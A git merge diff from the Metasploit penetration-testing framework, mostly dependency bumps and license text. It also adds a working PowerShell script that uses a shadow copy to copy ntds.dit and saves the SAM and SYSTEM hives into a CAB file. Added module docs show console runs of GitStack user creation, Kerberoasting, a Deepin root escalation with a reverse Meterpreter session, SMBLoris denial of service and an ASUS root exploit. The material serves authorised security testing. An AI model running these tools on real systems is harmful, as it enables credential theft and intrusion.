Merge master + workspace removal from http remote data service
commit
071a191055
26
Gemfile.lock
26
Gemfile.lock
|
@ -18,7 +18,7 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.3.32)
|
||||
metasploit-payloads (= 1.3.33)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.3.7)
|
||||
mqtt
|
||||
|
@ -59,7 +59,7 @@ PATH
|
|||
rex-text
|
||||
rex-zip
|
||||
ruby-macho
|
||||
ruby_smb (= 0.0.18)
|
||||
ruby_smb
|
||||
rubyntlm
|
||||
rubyzip
|
||||
sinatra
|
||||
|
@ -107,7 +107,7 @@ GEM
|
|||
arel (6.0.4)
|
||||
arel-helpers (2.6.1)
|
||||
activerecord (>= 3.1.0, < 6)
|
||||
backports (3.11.1)
|
||||
backports (3.11.3)
|
||||
bcrypt (3.1.11)
|
||||
bcrypt_pbkdf (1.0.0)
|
||||
bindata (2.4.3)
|
||||
|
@ -115,7 +115,7 @@ GEM
|
|||
builder (3.2.3)
|
||||
coderay (1.1.2)
|
||||
concurrent-ruby (1.0.5)
|
||||
crass (1.0.3)
|
||||
crass (1.0.4)
|
||||
daemons (1.2.6)
|
||||
diff-lcs (1.3)
|
||||
dnsruby (1.60.2)
|
||||
|
@ -129,7 +129,7 @@ GEM
|
|||
railties (>= 3.0.0)
|
||||
faker (1.8.7)
|
||||
i18n (>= 0.7)
|
||||
faraday (0.14.0)
|
||||
faraday (0.15.0)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
filesize (0.1.1)
|
||||
fivemat (1.3.6)
|
||||
|
@ -161,7 +161,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.3.32)
|
||||
metasploit-payloads (1.3.33)
|
||||
metasploit_data_models (3.0.0)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -201,8 +201,8 @@ GEM
|
|||
ttfunk
|
||||
pg (0.20.0)
|
||||
pg_array_parser (0.0.9)
|
||||
postgres_ext (3.0.0)
|
||||
activerecord (>= 4.0.0)
|
||||
postgres_ext (3.0.1)
|
||||
activerecord (~> 4.0)
|
||||
arel (>= 4.0.1)
|
||||
pg_array_parser (~> 0.0.9)
|
||||
pry (0.11.3)
|
||||
|
@ -229,7 +229,7 @@ GEM
|
|||
thor (>= 0.18.1, < 2.0)
|
||||
rake (12.3.1)
|
||||
rb-readline (0.5.5)
|
||||
recog (2.1.18)
|
||||
recog (2.1.19)
|
||||
nokogiri
|
||||
redcarpet (3.4.0)
|
||||
rex-arch (0.1.13)
|
||||
|
@ -245,7 +245,7 @@ GEM
|
|||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.17)
|
||||
rex-exploitation (0.1.19)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
|
@ -268,14 +268,14 @@ GEM
|
|||
metasm
|
||||
rex-core
|
||||
rex-text
|
||||
rex-socket (0.1.13)
|
||||
rex-socket (0.1.14)
|
||||
rex-core
|
||||
rex-sslscan (0.1.5)
|
||||
rex-core
|
||||
rex-socket
|
||||
rex-text
|
||||
rex-struct2 (0.1.2)
|
||||
rex-text (0.2.16)
|
||||
rex-text (0.2.20)
|
||||
rex-zip (0.1.3)
|
||||
rex-text
|
||||
rkelly-remix (0.0.7)
|
||||
|
@ -304,7 +304,7 @@ GEM
|
|||
rspec-support (3.7.1)
|
||||
ruby-macho (1.1.0)
|
||||
ruby-rc4 (0.1.5)
|
||||
ruby_smb (0.0.18)
|
||||
ruby_smb (0.0.23)
|
||||
bindata
|
||||
rubyntlm
|
||||
windows_error
|
||||
|
|
48
LICENSE
48
LICENSE
|
@ -603,6 +603,54 @@ License: Artistic
|
|||
DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
|
||||
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
License: Apache
|
||||
Version 1.1, 2000
|
||||
Modifications by CORE Security Technologies
|
||||
.
|
||||
Copyright (c) 2000 The Apache Software Foundation. All rights
|
||||
reserved.
|
||||
.
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions
|
||||
are met:
|
||||
.
|
||||
1. Redistributions of source code must retain the above copyright
|
||||
notice, this list of conditions and the following disclaimer.
|
||||
.
|
||||
2. Redistributions in binary form must reproduce the above copyright
|
||||
notice, this list of conditions and the following disclaimer in
|
||||
the documentation and/or other materials provided with the
|
||||
distribution.
|
||||
.
|
||||
3. The end-user documentation included with the redistribution,
|
||||
if any, must include the following acknowledgment:
|
||||
"This product includes software developed by
|
||||
CORE Security Technologies (http://www.coresecurity.com/)."
|
||||
Alternately, this acknowledgment may appear in the software itself,
|
||||
if and wherever such third-party acknowledgments normally appear.
|
||||
.
|
||||
4. The names "Impacket" and "CORE Security Technologies" must
|
||||
not be used to endorse or promote products derived from this
|
||||
software without prior written permission. For written
|
||||
permission, please contact oss@coresecurity.com.
|
||||
.
|
||||
5. Products derived from this software may not be called "Impacket",
|
||||
nor may "Impacket" appear in their name, without prior written
|
||||
permission of CORE Security Technologies.
|
||||
.
|
||||
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
|
||||
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
|
||||
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
||||
DISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
|
||||
ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
|
||||
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
|
||||
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
|
||||
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
|
||||
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
|
||||
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
|
||||
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
|
||||
SUCH DAMAGE.
|
||||
|
||||
License: Apache
|
||||
Version 2.0, January 2004
|
||||
http://www.apache.org/licenses/
|
||||
|
|
|
@ -102,7 +102,7 @@ rex-rop_builder, 0.1.3, "New BSD"
|
|||
rex-socket, 0.1.10, "New BSD"
|
||||
rex-sslscan, 0.1.5, "New BSD"
|
||||
rex-struct2, 0.1.2, "New BSD"
|
||||
rex-text, 0.2.16, "New BSD"
|
||||
rex-text, 0.2.17, "New BSD"
|
||||
rex-zip, 0.1.3, "New BSD"
|
||||
rkelly-remix, 0.0.7, MIT
|
||||
rspec, 3.7.0, MIT
|
||||
|
@ -114,7 +114,7 @@ rspec-rerun, 1.1.0, MIT
|
|||
rspec-support, 3.7.1, MIT
|
||||
ruby-macho, 1.1.0, MIT
|
||||
ruby-rc4, 0.1.5, MIT
|
||||
ruby_smb, 0.0.18, "New BSD"
|
||||
ruby_smb, 0.0.23, "New BSD"
|
||||
rubyntlm, 0.6.2, MIT
|
||||
rubyzip, 1.2.1, "Simplified BSD"
|
||||
sawyer, 0.8.1, MIT
|
||||
|
|
|
@ -0,0 +1,139 @@
|
|||
#Complete script created by Koen Riepe (koen.riepe@fox-it.com)
|
||||
#New-CabinetFile originally by Iain Brighton: http://virtualengine.co.uk/2014/creating-cab-files-with-powershell/
|
||||
function New-CabinetFile {
|
||||
[CmdletBinding()]
|
||||
Param(
|
||||
[Parameter(HelpMessage="Target .CAB file name.", Position=0, Mandatory=$true, ValueFromPipelineByPropertyName=$true)]
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[Alias("FilePath")]
|
||||
[string] $Name,
|
||||
|
||||
[Parameter(HelpMessage="File(s) to add to the .CAB.", Position=1, Mandatory=$true, ValueFromPipeline=$true)]
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[Alias("FullName")]
|
||||
[string[]] $File,
|
||||
|
||||
[Parameter(HelpMessage="Default intput/output path.", Position=2, ValueFromPipelineByPropertyName=$true)]
|
||||
[AllowNull()]
|
||||
[string[]] $DestinationPath,
|
||||
|
||||
[Parameter(HelpMessage="Do not overwrite any existing .cab file.")]
|
||||
[Switch] $NoClobber
|
||||
)
|
||||
|
||||
Begin {
|
||||
|
||||
## If $DestinationPath is blank, use the current directory by default
|
||||
if ($DestinationPath -eq $null) { $DestinationPath = (Get-Location).Path; }
|
||||
Write-Verbose "New-CabinetFile using default path '$DestinationPath'.";
|
||||
Write-Verbose "Creating target cabinet file '$(Join-Path $DestinationPath $Name)'.";
|
||||
|
||||
## Test the -NoClobber switch
|
||||
if ($NoClobber) {
|
||||
## If file already exists then throw a terminating error
|
||||
if (Test-Path -Path (Join-Path $DestinationPath $Name)) { throw "Output file '$(Join-Path $DestinationPath $Name)' already exists."; }
|
||||
}
|
||||
|
||||
## Cab files require a directive file, see 'http://msdn.microsoft.com/en-us/library/bb417343.aspx#dir_file_syntax' for more info
|
||||
$ddf = ";*** MakeCAB Directive file`r`n";
|
||||
$ddf += ";`r`n";
|
||||
$ddf += ".OPTION EXPLICIT`r`n";
|
||||
$ddf += ".Set CabinetNameTemplate=$Name`r`n";
|
||||
$ddf += ".Set DiskDirectory1=$DestinationPath`r`n";
|
||||
$ddf += ".Set MaxDiskSize=0`r`n";
|
||||
$ddf += ".Set Cabinet=on`r`n";
|
||||
$ddf += ".Set Compress=on`r`n";
|
||||
## Redirect the auto-generated Setup.rpt and Setup.inf files to the temp directory
|
||||
$ddf += ".Set RptFileName=$(Join-Path $ENV:TEMP "setup.rpt")`r`n";
|
||||
$ddf += ".Set InfFileName=$(Join-Path $ENV:TEMP "setup.inf")`r`n";
|
||||
|
||||
## If -Verbose, echo the directive file
|
||||
if ($PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent) {
|
||||
foreach ($ddfLine in $ddf -split [Environment]::NewLine) {
|
||||
Write-Verbose $ddfLine;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Process {
|
||||
|
||||
## Enumerate all the files add to the cabinet directive file
|
||||
foreach ($fileToAdd in $File) {
|
||||
|
||||
## Test whether the file is valid as given and is not a directory
|
||||
if (Test-Path $fileToAdd -PathType Leaf) {
|
||||
Write-Verbose """$fileToAdd""";
|
||||
$ddf += """$fileToAdd""`r`n";
|
||||
}
|
||||
## If not, try joining the $File with the (default) $DestinationPath
|
||||
elseif (Test-Path (Join-Path $DestinationPath $fileToAdd) -PathType Leaf) {
|
||||
Write-Verbose """$(Join-Path $DestinationPath $fileToAdd)""";
|
||||
$ddf += """$(Join-Path $DestinationPath $fileToAdd)""`r`n";
|
||||
}
|
||||
else { Write-Warning "File '$fileToAdd' is an invalid file or container object and has been ignored."; }
|
||||
}
|
||||
}
|
||||
|
||||
End {
|
||||
|
||||
$ddfFile = Join-Path $DestinationPath "$Name.ddf";
|
||||
$ddf | Out-File $ddfFile -Encoding ascii | Out-Null;
|
||||
|
||||
Write-Verbose "Launching 'MakeCab /f ""$ddfFile""'.";
|
||||
$makeCab = Invoke-Expression "MakeCab /F ""$ddfFile""";
|
||||
|
||||
## If Verbose, echo the MakeCab response/output
|
||||
if ($PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent) {
|
||||
## Recreate the output as Verbose output
|
||||
foreach ($line in $makeCab -split [environment]::NewLine) {
|
||||
if ($line.Contains("ERROR:")) { throw $line; }
|
||||
else { Write-Verbose $line; }
|
||||
}
|
||||
}
|
||||
|
||||
## Delete the temporary .ddf file
|
||||
Write-Verbose "Deleting the directive file '$ddfFile'.";
|
||||
Remove-Item $ddfFile;
|
||||
|
||||
## Return the newly created .CAB FileInfo object to the pipeline
|
||||
Get-Item (Join-Path $DestinationPath $Name);
|
||||
}
|
||||
}
|
||||
|
||||
$key = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters"
|
||||
$ntdsloc = (Get-ItemProperty -Path $key -Name "DSA Database file")."DSA Database file"
|
||||
$ntdspath = $ntdsloc.split(":")[1]
|
||||
$ntdsdisk = $ntdsloc.split(":")[0]
|
||||
|
||||
(Get-WmiObject -list win32_shadowcopy).create($ntdsdisk + ":\","ClientAccessible")
|
||||
|
||||
$id_shadow = "None"
|
||||
$volume_shadow = "None"
|
||||
|
||||
if (!(Get-WmiObject win32_shadowcopy).length){
|
||||
Write-Host "Only one shadow clone"
|
||||
$id_shadow = (Get-WmiObject win32_shadowcopy).ID
|
||||
$volume_shadow = (Get-WmiObject win32_shadowcopy).DeviceObject
|
||||
} Else {
|
||||
$n_shadows = (Get-WmiObject win32_shadowcopy).length-1
|
||||
$id_shadow = (Get-WmiObject win32_shadowcopy)[$n_shadows].ID
|
||||
$volume_shadow = (Get-WmiObject win32_shadowcopy)[$n_shadows].DeviceObject
|
||||
}
|
||||
|
||||
$command = "cmd.exe /c copy "+ $volume_shadow + $ntdspath + " " + ".\ntds.dit"
|
||||
iex $command
|
||||
|
||||
$command2 = "cmd.exe /c reg save HKLM\SYSTEM .\SYSTEM"
|
||||
iex $command2
|
||||
|
||||
$command3 = "cmd.exe /c reg save HKLM\SAM .\SAM"
|
||||
iex $command3
|
||||
|
||||
(Get-WmiObject -Namespace root\cimv2 -Class Win32_ShadowCopy | Where-Object {$_.DeviceObject -eq $volume_shadow}).Delete()
|
||||
if (Test-Path "All.cab"){
|
||||
Remove-Item "All.cab"
|
||||
}
|
||||
New-CabinetFile -Name All.cab -File "SAM","SYSTEM","ntds.dit"
|
||||
Remove-Item ntds.dit
|
||||
Remove-Item SAM
|
||||
Remove-Item SYSTEM
|
Binary file not shown.
|
@ -0,0 +1,106 @@
|
|||
## Description
|
||||
|
||||
GitStack through v2.3.10 contains unauthenticated REST API endpoints that can be used to retrieve information about the application and make changes to it as well. This module generates requests to the vulnerable API endpoints. This module has been tested against GitStack v2.3.10.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
The GitStack application provides REST API functionality to list application users, list application repositories, create application users, etc. Several of the application's REST API endpoints do not require authentication, which allows those with network-level access to the application to take advantage of these unprotected requests.
|
||||
|
||||
Application user accounts created through the REST API do not have access to the admin web interface, but the accounts can be added and removed from repositories using additional API requests.
|
||||
|
||||
## Actions
|
||||
|
||||
**LIST**
|
||||
|
||||
List application user accounts.
|
||||
|
||||
Note: The account `everyone` is a default account.
|
||||
|
||||
**LIST_REPOS**
|
||||
|
||||
List application repositories.
|
||||
|
||||
**CREATE**
|
||||
|
||||
Create a user account and add the account to all available repositories.
|
||||
|
||||
**CLEANUP**
|
||||
|
||||
Remove the specified application user account from all available repositories and delete the application account.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
- [ ] Install a vulnerable GitStack application
|
||||
- [ ] Create a few application user accounts
|
||||
- [ ] Create a few application repositories
|
||||
- [ ] `./msfconsole`
|
||||
- [ ] `use auxiliary/admin/http/gitstack_rest`
|
||||
- [ ] `set rhost <rhost>`
|
||||
- [ ] `run`
|
||||
- [ ] Verify the application user list that is returned
|
||||
- [ ] `set action LIST_REPOS`
|
||||
- [ ] `run`
|
||||
- [ ] Verify the repository list that is returned
|
||||
- [ ] `set username <username>`
|
||||
- [ ] `set password <password>`
|
||||
- [ ] `set action CREATE`
|
||||
- [ ] `run`
|
||||
- [ ] On the application verify that the user has been created
|
||||
- [ ] On the application verify that the user has access to the repositories
|
||||
- [ ] `set action CLEANUP`
|
||||
- [ ] `run`
|
||||
- [ ] On the application verify that the user doesn't have access to the repositories
|
||||
- [ ] On the application verify that the user has been deleted
|
||||
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### GitStack v2.3.10 on Windows 7 SP1 x64
|
||||
|
||||
```
|
||||
msfdev@simulator:~/git/metasploit-framework$ ./msfconsole -q -r test.rc
|
||||
[*] Processing test.rc for ERB directives.
|
||||
resource (test.rc)> use auxiliary/admin/http/gitstack_rest
|
||||
resource (test.rc)> set rhost 172.22.222.122
|
||||
rhost => 172.22.222.122
|
||||
resource (test.rc)> run
|
||||
[*] User List:
|
||||
[+] rick
|
||||
[+] morty
|
||||
[+] everyone
|
||||
[*] Auxiliary module execution completed
|
||||
resource (test.rc)> set action LIST_REPOS
|
||||
action => LIST_REPOS
|
||||
resource (test.rc)> run
|
||||
[*] Repo List:
|
||||
[+] brainalyzer
|
||||
[+] c137
|
||||
[*] Auxiliary module execution completed
|
||||
resource (test.rc)> set action CREATE
|
||||
action => CREATE
|
||||
resource (test.rc)> run
|
||||
[+] SUCCESS: msf:password
|
||||
[+] User msf added to brainalyzer
|
||||
[+] User msf added to c137
|
||||
[*] Auxiliary module execution completed
|
||||
resource (test.rc)> set action CLEANUP
|
||||
action => CLEANUP
|
||||
resource (test.rc)> run
|
||||
[+] msf removed from brainalyzer
|
||||
[+] msf removed from c137
|
||||
[+] msf has been deleted
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
After CREATE, but before CLEANUP, use git to clone the remote repositories.
|
||||
|
||||
```
|
||||
msfdev@simulator:~/money-bugs$ git clone http://msf:password@172.22.222.122/brainalyzer.git
|
||||
Cloning into 'brainalyzer'...
|
||||
remote: Counting objects: 3, done.
|
||||
Unpacking objects: 100% (3/3), done.
|
||||
remote: Total 3 (delta 0), reused 0 (delta 0)
|
||||
msfdev@simulator:~/money-bugs$ cd brainalyzer/ && ls
|
||||
szechuan_sauce.md
|
||||
```
|
|
@ -3,7 +3,7 @@
|
|||
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
|
||||
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
|
||||
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
|
||||
|
||||
|
||||
The module opens over 64,000 connections to the target service, so please make sure
|
||||
your system ULIMIT is set appropriately to handle it. A single host running this module
|
||||
can theoretically consume up to 8GB of memory on the target.
|
||||
|
@ -14,7 +14,7 @@
|
|||
|
||||
1. Start msfconsole
|
||||
1. Do: `use auxiliary/dos/smb/smb_loris`
|
||||
1. Do: `set RHOST [IP]`
|
||||
1. Do: `set rhost [IP]`
|
||||
1. Do: `run`
|
||||
1. Target should allocate increasing amounts of memory.
|
||||
|
||||
|
@ -30,14 +30,11 @@ msf auxiliary(smb_loris) >
|
|||
|
||||
msf auxiliary(smb_loris) > run
|
||||
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
|
||||
....
|
||||
[*] Starting server...
|
||||
[*] 192.168.172.138:445 - 100 socket(s) open
|
||||
[*] 192.168.172.138:445 - 200 socket(s) open
|
||||
...
|
||||
[!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits.
|
||||
[*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open
|
||||
...
|
||||
```
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module retrieves a browser's network interface IP addresses using WebRTC. However, after visiting the HTTP server, the browser can disclose a private IP address in a STUN request.
|
||||
|
||||
Related links : https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html
|
||||
|
||||
## Verification
|
||||
|
||||
Start msfconsole
|
||||
use auxiliary/gather/browser_lanipleak
|
||||
Set SRVHOST
|
||||
Set SRVPORT
|
||||
run (Server started)
|
||||
Visit server URL in any browser which has WebRTC enabled
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf auxiliary(gather/browser_lanipleak) > show options
|
||||
|
||||
Module options (auxiliary/gather/browser_lanipleak):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SRVHOST 192.168.1.104 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL false no Negotiate SSL for incoming connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
WebServer
|
||||
|
||||
|
||||
msf auxiliary(gather/browser_lanipleak) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf auxiliary(gather/browser_lanipleak) >
|
||||
[*] Using URL: http://192.168.1.104:8080/mIV1EgzDiEEIMT
|
||||
[*] Server started.
|
||||
|
||||
[*] 192.168.1.104: Sending response (2523 bytes)
|
||||
[+] 192.168.1.104: Found IP address: X.X.X.X
|
||||
```
|
|
@ -0,0 +1,31 @@
|
|||
## Description
|
||||
|
||||
This module will try to find Service Principal Names (SPN) that are associated with normal user accounts on the specified domain and then submit requests to retrive Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPNs NTLM hash. After retrieving the TGS tickets, offline brute forcing attacks can be performed to retrieve the passwords for the SPN accounts.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
To avoid library/version conflict, it would be useful to have a pipenv virtual environment.
|
||||
|
||||
* `pipenv --two && pipenv shell`
|
||||
* Follow the [impacket installation steps](https://github.com/CoreSecurity/impacket#installing) to install the required libraries.
|
||||
* Have a domain user account credentials
|
||||
* `./msfconsole -q -x 'use auxiliary/gather/get_user_spns; set rhosts <dc-ip> ; set smbuser <user> ; set smbpass <password> ; set smbdomain <domain> ; run'`
|
||||
* Get Hashes
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
$ ./msfconsole -q -x 'use auxiliary/gather/get_user_spns; set rhosts <dc-ip> ; set smbuser <user> ; set smbpass <password> ; set smbdomain <domain> ; run'
|
||||
rhosts => <dc-ip>
|
||||
smbuser => <user>
|
||||
smbpass => <password>
|
||||
smbdomain => <domain>
|
||||
[*] Running for <domain>...
|
||||
[*] Total of records returned <num>
|
||||
[+] ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
|
||||
[+] ------------------------------------------------ ---------- -------------------------------------------------------------------------------- ------------------- -------------------
|
||||
[+] SPN... User... List... DateTime... Time...
|
||||
[+] $krb5tgs$23$*user$realm$test/spn*$<data>
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -75,10 +75,6 @@ msf5 auxiliary(scanner/etcd/open_key_scanner) > set RHOSTS 127.0.0.1
|
|||
RHOSTS => 127.0.0.1
|
||||
msf5 auxiliary(scanner/etcd/open_key_scanner) > run
|
||||
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/etcd/open_key_scanner) > run
|
||||
|
||||
[+] 127.0.0.1:2379
|
||||
Version: {"etcdserver":"3.1.3","etcdcluster":"3.1.0"}
|
||||
Data: {
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
## Vulnerable Application
|
||||
|
||||
etcd is a distributed reliable key-value store. It exposes and API from which you can obtain the version of etcd and related components.
|
||||
|
||||
### Docker
|
||||
|
||||
1. `docker run -p 2379:2379 miguelgrinberg/easy-etcd`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/etcd/version```
|
||||
4. Do: ```set rhosts [IPs]```
|
||||
5. Do: ```run```
|
||||
6. You should get a JSON response for the version and the service identified in `services`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### etcd in Docker
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/etcd/version
|
||||
msf5 auxiliary(scanner/etcd/version) > set RHOSTS localhost
|
||||
RHOSTS => localhost
|
||||
msf5 auxiliary(scanner/etcd/version) > run
|
||||
|
||||
[+] 127.0.0.1:2379 : {"etcdserver"=>"3.1.3", "etcdcluster"=>"3.1.0"}
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/etcd/version) > services
|
||||
Services
|
||||
========
|
||||
|
||||
host port proto name state info
|
||||
---- ---- ----- ---- ----- ----
|
||||
127.0.0.1 2379 tcp etcd open {"etcdserver"=>"3.1.3", "etcdcluster"=>"3.1.0"}
|
||||
```
|
|
@ -0,0 +1,101 @@
|
|||
## Description
|
||||
|
||||
This module attempts to gain root privileges on [Deepin Linux](https://www.deepin.org/en/) systems
|
||||
by using `lastore-daemon` to install a package. It may cause audio and/or graphical signals confirming
|
||||
the installation of the payload package.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
The `lastore-daemon` D-Bus configuration on Deepin Linux 15.5 permits any
|
||||
user in the `sudo` group to install arbitrary system packages without
|
||||
providing a password, resulting in code execution as root. By default,
|
||||
the first user created on the system is a member of the `sudo` group.
|
||||
|
||||
The D-Bus configuration in `/usr/share/dbus-1/system.d/com.deepin.lastore.conf`
|
||||
permits users of the `sudo` group to execute arbitrary methods on the
|
||||
`com.deepin.lastore` interface, as shown below:
|
||||
|
||||
```xml
|
||||
<!-- Only root can own the service -->
|
||||
<policy user="root">
|
||||
<allow own="com.deepin.lastore"/>
|
||||
<allow send_destination="com.deepin.lastore"/>
|
||||
</policy>
|
||||
|
||||
<!-- Allow sudo group to invoke methods on the interfaces -->
|
||||
<policy group="sudo">
|
||||
<allow own="com.deepin.lastore"/>
|
||||
<allow send_destination="com.deepin.lastore"/>
|
||||
</policy>
|
||||
```
|
||||
|
||||
This module has been tested successfully with lastore-daemon version
|
||||
0.9.53-1 on Deepin Linux 15.5 (x64).
|
||||
|
||||
Deepin Linux is available here:
|
||||
|
||||
* https://www.deepin.org/en/mirrors/releases/
|
||||
|
||||
`lastore-daemon` source repository is available here:
|
||||
|
||||
* https://cr.deepin.io/#/admin/projects/lastore/lastore-daemon
|
||||
* https://github.com/linuxdeepin/lastore-daemon/
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Get a session
|
||||
3. `use exploit/linux/local/lastore_daemon_dbus_priv_esc`
|
||||
4. `set SESSION [SESSION]`
|
||||
5. `check`
|
||||
6. `run`
|
||||
7. You should get a new *root* session
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**SESSION**
|
||||
|
||||
Which session to use, which can be viewed with `sessions`
|
||||
|
||||
**WritableDir**
|
||||
|
||||
A writable directory file system path. (default: `/tmp`)
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use exploit/linux/local/lastore_daemon_dbus_priv_esc
|
||||
msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 1
|
||||
session => 1
|
||||
msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > run
|
||||
|
||||
[!] SESSION may not be compatible with this module.
|
||||
[*] Started reverse TCP handler on 172.16.191.188:4444
|
||||
[*] Building package...
|
||||
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/control' (98 bytes) ...
|
||||
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/postinst' (28 bytes) ...
|
||||
[*] Uploading payload...
|
||||
[*] Writing '/tmp/.1sZZ46ozIH' (207 bytes) ...
|
||||
[*] Installing package...
|
||||
[*] Sending stage (857352 bytes) to 172.16.191.200
|
||||
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.200:51464) at 2018-03-24 18:45:29 -0400
|
||||
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/control
|
||||
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/postinst
|
||||
[+] Deleted /tmp/.1sZZ46ozIH
|
||||
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN
|
||||
[*] Removing package...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.16.191.200
|
||||
OS : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
|
||||
Architecture : x64
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
```
|
||||
|
|
@ -0,0 +1,78 @@
|
|||
## Description
|
||||
|
||||
This module exploits an authentication bypass vulnerability in the infosvr service running on various ASUS routers to execute arbitrary commands as `root`.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
The ASUS infosvr service is enabled by default on various models of ASUS routers and listens on the LAN interface on UDP port 9999. Unpatched versions of this service allow unauthenticated remote command execution as the `root` user.
|
||||
|
||||
This module launches the BusyBox Telnet daemon on the port specified in the `TelnetPort` option to gain an interactive remote shell.
|
||||
|
||||
This module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35.
|
||||
|
||||
Numerous ASUS models are [reportedly affected](https://github.com/jduck/asus-cmd), but untested.
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use exploit/linux/misc/asus_infosvr_auth_bypass_exec`
|
||||
3. `set RHOST [IP]`
|
||||
4. `run`
|
||||
5. You should get a *root* session
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
|
||||
**TelnetPort**
|
||||
|
||||
